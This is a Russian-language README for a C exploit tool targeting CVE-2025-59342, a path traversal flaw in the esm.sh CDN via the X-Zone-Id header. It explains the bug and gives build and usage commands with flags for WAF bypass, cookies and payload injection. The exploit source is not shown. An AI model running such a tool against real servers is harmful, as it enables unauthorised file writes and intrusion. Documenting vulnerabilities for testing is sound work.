
Эксплойт на C для CVE-2025-59342 — обход пути в esm.sh CDN (v136 и ранее). Внедряет полезные нагрузки через заголовок X-Zone-Id с обходом WAF и поддержкой cookie для пентеста.
Автор: Byte Reaper
CVE-2025-59342 — это уязвимость path traversal в esm.sh, CDN без сборки для современной веб-разработки, в версии 136 и более ранних.
Проблема возникает при обработке HTTP-заголовка X-Zone-Id, который используется для построения пути в файловой системе. Значение заголовка не подвергается должной канонизации и не ограничивается базовым каталогом хранения приложения.
В результате передача последовательностей ../ в X-Zone-Id может привести к записи файлов за пределами intended каталога хранения.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
./CVE-2025-59342 -u http://target (auto port = 80)
- Подробный режим :
./CVE-2025-59342 -u http://target -v
- Обход WAF :
./CVE-2025-59342 -u http://target -v -b
- Файл с куками :
./CVE-2025-59342 -u http://target -c [FILE] -v
- Порт целевого сервера :
./CVE-2025-59342 -u http://target -p [PORT]
- Полезная нагрузка (Payload) :
./CVE-2025-59342 -u http://target -p [Payload injection]
MIT